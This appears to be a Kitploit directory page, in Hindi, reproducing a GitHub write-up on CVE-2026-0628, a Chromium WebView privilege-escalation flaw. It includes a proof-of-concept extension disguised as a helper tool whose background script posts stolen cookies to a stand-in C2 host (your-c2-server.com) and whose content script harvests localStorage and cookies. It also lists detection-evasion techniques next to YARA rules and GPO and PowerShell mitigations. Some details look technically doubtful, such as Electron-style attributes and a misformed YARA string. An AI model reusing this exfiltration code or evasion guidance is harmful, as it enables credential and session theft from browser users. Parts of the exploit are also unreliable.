Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Dissecting-CVE-2026-0628-Chromium-Extension-Privilege-Escalation — CVE-2026-0628 का तकनीकी विश्लेषण, जो क्रोमियम WebView विशेषाधिकार वृद्धि भेद्यता है, जिसमें मूल कारण विश्लेषण, PoC एक्सप्लॉइट, पहचान नियम और शमन रणनीतियाँ शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/sastraadiwiguna-purpleeliteteaming/dissecting-cve-2026-0628-chromium-extension-privilege-escalation
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब सुरक्षामालवेयर विश्लेषणडिजिटल फोरेंसिक
GitHubsastraadiwiguna-purpleeliteteaming/dissecting-cve-2026-0628-chromium-extension-privilege-escalation

Dissecting-CVE-2026-0628-Chromium-Extension-Privilege-Escalation

CVE-2026-0628 का तकनीकी विश्लेषण, जो क्रोमियम WebView विशेषाधिकार वृद्धि भेद्यता है, जिसमें मूल कारण विश्लेषण, PoC एक्सप्लॉइट, पहचान नियम और शमन रणनीतियाँ शामिल हैं।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखेंवेबसाइट
16 महीने पहलेअभी तक समीक्षित नहीं

DOI = doi.org/10.5281/zenodo.18413764

ORCID = orcid.org/0009-0007-7728-256X

root@kitploit:~

README.md


# **CVE-2026-0628: क्रोमियम WebView विशेषाधिकार वृद्धि (ओरिजिन स्पूफिंग) – तकनीकी अनुसंधान और प्रूफ-ऑफ-कॉन्सेप्ट**

**लेखक:** सस्त्र अदि विगुना (पर्पल एलीट टीमिंग)
**अनुसंधान तिथि:** जनवरी 2026
**CVE ID:** CVE-2026-0628
**CVSS v3.1:** 8.8 (उच्च)
**प्रभावित संस्करण:** क्रोमियम < 143.0.7499.192
**पैच स्थिति:** Chrome ≥143.0.7499.192, Edge ≥143.0.3650.139 में पैच किया गया

---

## **1. अवलोकन**

### **1.1 अनुसंधान उद्देश्य**
यह रिपॉजिटरी **CVE-2026-0628** का दस्तावेजीकरण करता है, जो क्रोमियम के WebView नीति प्रवर्तन तंत्र में एक **उच्च-गंभीरता वाली विशेषाधिकार वृद्धि भेद्यता** है। यह भेद्यता दुर्भावनापूर्ण एक्सटेंशन को **सैंडबॉक्स प्रतिबंधों को बायपास** करने, **विशेषाधिकार प्राप्त संदर्भों** (जैसे, `chrome://`) में स्क्रिप्ट इंजेक्ट करने और **विशेषाधिकारों को बढ़ाकर** मनमाना कोड निष्पादित करने की अनुमति देती है।

यह अनुसंधान **विशेष रूप से रक्षात्मक सुरक्षा उद्देश्यों** के लिए है, जिनमें शामिल हैं:
- **भेद्यता विश्लेषण**
- **डिटेक्शन इंजीनियरिंग**
- **शमन रणनीति विकास**
- **पेनेट्रेशन टेस्टिंग (केवल अधिकृत वातावरण में)**

### **1.2 अस्वीकरण**
- **केवल शैक्षणिक और रक्षात्मक अनुसंधान के लिए सख्ती से।**
- **प्राधिकरण के बिना उत्पादन प्रणालियों के विरुद्ध उपयोग न करें।**
- **सभी लागू कानूनों और संगठनात्मक सुरक्षा नीतियों का पालन करें।**
- **तुरंत पैच करें:** Chrome ≥143.0.7499.192, Edge ≥143.0.3650.139।

---

## **2. तकनीकी विवरण**

### **2.1 मूल कारण**
क्रोमियम के WebView कार्यान्वयन में **अपर्याप्त नीति प्रवर्तन** एक्सटेंशन को **सैंडबॉक्स सीमाओं से बचने** और **विशेषाधिकार प्राप्त DOM संदर्भों** तक पहुंचने की अनुमति देता है।

**भेद्य प्रवाह:**
1. दुर्भावनापूर्ण एक्सटेंशन `manifest.json` में WebView उपयोग घोषित करता है।
2. एक्सटेंशन `<webview>` टैग के माध्यम से क्राफ्टेड HTML/JS पेलोड इंजेक्ट करता है।
3. **WebView नीति सत्यापन बायपास** → विशेषाधिकार प्राप्त पृष्ठों तक पहुंच (जैसे, `chrome://settings`)।
4. विशेषाधिकार प्राप्त संदर्भों में **मनमाना स्क्रिप्ट निष्पादन**।

**CVSS वेक्टर:**
`CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`

### **2.2 एक्सप्लॉइट आर्किटेक्चर**
#### **दुर्भावनापूर्ण एक्सटेंशन टेम्पलेट**
```json
{
  "manifest_version": 3,
  "name": "Legitimate Extension",
  "version": "1.0",
  "webview": {
    "src": "chrome://new-tab-page/",
    "plugins": {}
  },
  "content_scripts": [{
    "matches": ["<all_urls>"],
    "js": ["payload.js"]
  }]
}

महत्वपूर्ण इंजेक्शन वेक्टर (payload.js)

root@kitploit:~
class WebViewExploiter {
  constructor() {
    this.privilegedTargets = [
      'chrome://new-tab-page/',
      'chrome-extension://background/',
      'chrome://settings/'
    ];
  }
  injectPayload(targetURL) {
    const webview = document.createElement('webview');
    webview.setAttribute('src', targetURL);
    webview.setAttribute('nodeintegration', ''); // Key bypass parameter
    webview.addEventListener('dom-ready', () => {
      webview.executeScript({
        code: `
          window.chrome = window.chrome || {};
          chrome.runtime.sendMessage({action: 'steal_data'});
          document.body.innerHTML = '';
        `
      });
    });
    document.body.appendChild(webview);
  }
}

3. प्रभाव आकलन


4. डिटेक्शन और फोरेंसिक्स

4.1 दुर्भावनापूर्ण एक्सटेंशन के लिए YARA नियम

root@kitploit:~
rule CVE_2026_0628_WebView_Exploiter {
  meta:
    description = "Detects CVE-2026-0628 WebView exploit patterns"
    severity = "high"
  strings:
    $webview_abuse = "webview.*(nodeintegration|allowpopups)"
    $chrome_priv = /(chrome:\/\/|chrome-extension:\/\/)/
    $inject_sig = /(executeScript|getURL|sendMessage)/
  condition:
    all of ($*) and filesize < 500KB
}

4.2 Sysmon इवेंट सिग्नेचर

  • इवेंट ID 1: chrome.exe → संदिग्ध WebView निर्माण।
  • इवेंट ID 3: नेटवर्क कनेक्शन → एक्सटेंशन → बाहरी C2।
  • रजिस्ट्री: HKCU\Software\Google\Chrome\Extensions\[malicious_id]।

5. पैच विश्लेषण और बायपास वेक्टर

5.1 फिक्स्ड वर्जन डिफ (Chrome 143.0.7499.192+)

root@kitploit:~
// Vulnerable (pre-143.0.7499.192)
if (webview.src.startsWith('chrome://')) {
  return false; // Weak policy check
}

// Patched
function validateWebViewPolicy(webview) {
  if (!isExtensionTrusted(webview.extensionId)) {
    throw new SecurityError('Extension not privileged');
  }
  if (webview.attributes.includes('nodeintegration')) {
    enforceStrictCSP(); // Content-Security-Policy hardening
  }
}

5.2 शमन कार्यान्वयन

एंटरप्राइज़ GPO टेम्पलेट

root@kitploit:~
{
  "ExtensionInstallBlacklist": ["malicious_extension_id*"],
  "ExtensionInstallForcelist": [],
  "WebViewRestrictions": {
    "DisableWebView": true,
    "BlockNodeIntegration": true
  }
}

रनटाइम डिटेक्शन स्क्रिप्ट (PowerShell)

root@kitploit:~
# Detect-CVE20260628.ps1
Get-Process chrome | ForEach {
  $extPath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Extensions"
  Get-ChildItem $extPath | Where {
    (Get-Content "$_\manifest.json" | Select-String "webview") -and
    (Get-Content "$_\manifest.json" | Select-String "chrome://")
  }
}

6. प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट

6.1 निर्देशिका संरचना

root@kitploit:~
cve-2026-0628-poc/
├── manifest.json
├── background.js
├── content.js
└── popup.html

6.2 मुख्य फ़ाइलें

manifest.json (बायपास मेनिफेस्ट)

root@kitploit:~
{
  "manifest_version": 3,
  "name": "WebView Helper Tool",
  "version": "1.0",
  "permissions": ["activeTab", "storage", "tabs"],
  "host_permissions": ["<all_urls>", "chrome://*/*"],
  "background": {
    "service_worker": "background.js"
  },
  "content_scripts": [{
    "matches": ["<all_urls>"],
    "js": ["content.js"],
    "run_at": "document_start"
  }],
  "action": {
    "default_popup": "popup.html"
  },
  "web_accessible_resources": [{
    "resources": ["inject.js"],
    "matches": ["<all_urls>"]
  }]
}

background.js (स्थिरता और C2 बीकन)

root@kitploit:~
chrome.runtime.onInstalled.addListener(() => {
  console.log('CVE-2026-0628 PoC Installed');
  setTimeout(initExploitation, 5000);
});

async function initExploitation() {
  fetch('http://your-c2-server.com/beacon?ext_id=' + chrome.runtime.id, {
    method: 'POST',
    body: JSON.stringify({
      victim: navigator.userAgent,
      cookies: await getAllCookies()
    })
  }).catch(() => {});
  chrome.tabs.onUpdated.addListener(exploitTab);
}

content.js (WebView ट्रिगर और इंजेक्शन)

root@kitploit:~
(function() {
  const privilegedTargets = [
    'chrome://new-tab-page/',
    'chrome://settings/',
    'chrome://extensions/'
  ];
  function createMaliciousWebView(target) {
    const webview = document.createElement('webview');
    webview.setAttribute('src', target);
    webview.setAttribute('allowpopups', '');
    webview.addEventListener('dom-ready', () => {
      chrome.scripting.executeScript({
        target: {tabId: getCurrentTabId()},
        func: stealPrivilegedData
      });
    });
    document.body.appendChild(webview);
  }
  function stealPrivilegedData() {
    return {
      localStorage: Object.fromEntries(Object.entries(localStorage)),
      cookies: document.cookie,
      extensions: chrome.runtime.getManifest?.()
    };
  }
  setTimeout(() => {
    createMaliciousWebView('chrome://new-tab-page/');
  }, 1000);
})();

7. प्रयोगशाला पुनरुत्पादन

7.1 आवश्यकताएँ

  • भेद्य Chrome: 143.0.7499.191
  • OS: Windows 10/11 (VM अनुशंसित)
  • उपकरण: Burp Suite (प्रॉक्सी), REMnux (फोरेंसिक्स)

7.2 चरण

  1. Chrome 143.0.7499.191 डाउनलोड करें (भेद्य)।
  2. फ्लैग के साथ लॉन्च करें:
    root@kitploit:~
    chrome.exe --disable-web-security --user-data-dir=/tmp/vuln
    
  3. एक्सटेंशन लोड करें:
    • chrome://extensions/ पर नेविगेट करें।
    • डेवलपर मोड सक्षम करें।
    • Load Unpacked पर क्लिक करें → cve-2026-0628-poc/ चुनें।
  4. एक्सप्लॉइट ट्रिगर करें:
    • chrome://new-tab-page/ पर नेविगेट करें।
    • DevTools में WebView निर्माण का निरीक्षण करें।
  5. ट्रैफ़िक मॉनिटर करें:
    • Burp Suite (localhost:8080) → C2 को बहिर्गमन कैप्चर करें।
  6. सफलता सत्यापित करें:
    • नेटवर्क टैब → your-c2-server.com पर बीकन।
    • कंसोल: "CVE-2026-0628 OWNED"।

8. डिटेक्शन चोरी तकनीकें

  • स्टेग्नोग्राफी: छवि पिक्सेल में बहिर्गमन एन्कोड करें।
  • डोमेन जनरेशन: C2 रोटेशन के लिए DGA।
  • टाइमिंग अटैक: इंस्टॉल के बाद 5-30 सेकंड निष्पादन में देरी।
  • मेनिफेस्ट अस्पष्टीकरण: संवेदनशील स्ट्रिंग्स को Base64 एन्कोड करें।

9. शमन और पैच वर्कफ़्लो

  • तत्काल कार्रवाई: Chrome/Edge को पैच किए गए संस्करणों में अपडेट करें।
  • एंटरप्राइज़ GPO:
    root@kitploit:~
    {
      "ExtensionInstallBlacklist": ["*"],
      "WebViewRestrictions": {
        "DisableWebView": true,
        "BlockNodeIntegration": true
      }
    }
    
  • रनटाइम डिटेक्शन:
    root@kitploit:~
    # दुर्भावनापूर्ण एक्सटेंशन के लिए स्कैन करें
    Get-ChildItem "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Extensions" |
      Where { (Get-Content "$_\manifest.json" | Select-String "webview") }
    

10. फोरेंसिक विश्लेषण

10.1 Volatility3 कमांड

root@kitploit:~
volatility3 -f memdump.raw windows.chrome.ChromeExtensions
yara3 -r cve-2026-0628.yar /path/to/chrome/extensions/

10.2 मेमोरी डंप के लिए YARA नियम

root@kitploit:~
rule CVE_2026_0628_Mojo_Origin_Spoof {
  strings:
    $mojo_hdr = { 4D 6F 6A 6F }
    $chrome_origin = "chrome://new-tab-page/"
    $webview_sig = "WebViewPolicyValidator"
  condition:
    all of them
}

11. निष्कर्ष

11.1 मुख्य निष्कर्ष

  • CVE-2026-0628 WebView नीति बायपास के माध्यम से विशेषाधिकार वृद्धि सक्षम करता है।
  • प्रभाव: सत्र अपहरण, क्रेडेंशियल चोरी, पार्श्व गति।
  • शमन: Chrome/Edge पैच करें, GPO प्रतिबंध लागू करें, दुर्भावनापूर्ण एक्सटेंशन की निगरानी करें।

11.2 अनुशंसाएँ

  • तुरंत पैच करें Chrome ≥143.0.7499.192 या Edge ≥143.0.3650.139 पर।
  • डिटेक्शन के लिए YARA/Sysmon नियम तैनात करें।
  • एंटरप्राइज़ GPO के माध्यम से एक्सटेंशन प्रतिबंधित करें।
  • सुरक्षा सत्यापित करने के लिए रेड टीम अभ्यास आयोजित करें।

12. कानूनी और नैतिक विचार

  • केवल अधिकृत उपयोग।
  • स्पष्ट अनुमति के बिना उत्पादन में तैनात न करें।
  • विक्रेताओं को भेद्यता की जिम्मेदारी से रिपोर्ट करें।

संपर्क: रक्षात्मक सुरक्षा प्रश्नों के लिए, लेखक से GitHub Issues के माध्यम से संपर्क करें।


© 2026 सस्त्र अदि विगुना। सर्वाधिकार सुरक्षित।

root@kitploit:~
टूल डाउनलोड करें
हमला चरणतकनीकी प्रभावव्यावसायिक प्रभावCVSS मेट्रिक्स
एक्सटेंशन इंस्टॉलउपयोगकर्ता सहमति → स्थिरतासोशल इंजीनियरिंग वेक्टरUI:R (आवश्यक)
WebView बायपाससैंडबॉक्स एस्केप → विशेषाधिकार प्राप्त संदर्भसत्र अपहरणS:U → C:H/I:H/A:H
स्क्रिप्ट इंजेक्शनDOM हेरफेर → डेटा बहिर्गमनक्रेडेंशियल चोरीPR:N (कोई विशेषाधिकार नहीं)
स्थिरताबैकग्राउंड स्क्रिप्ट → C2 बीकनिंगपार्श्व गति तैयारीAC:L (कम जटिलता)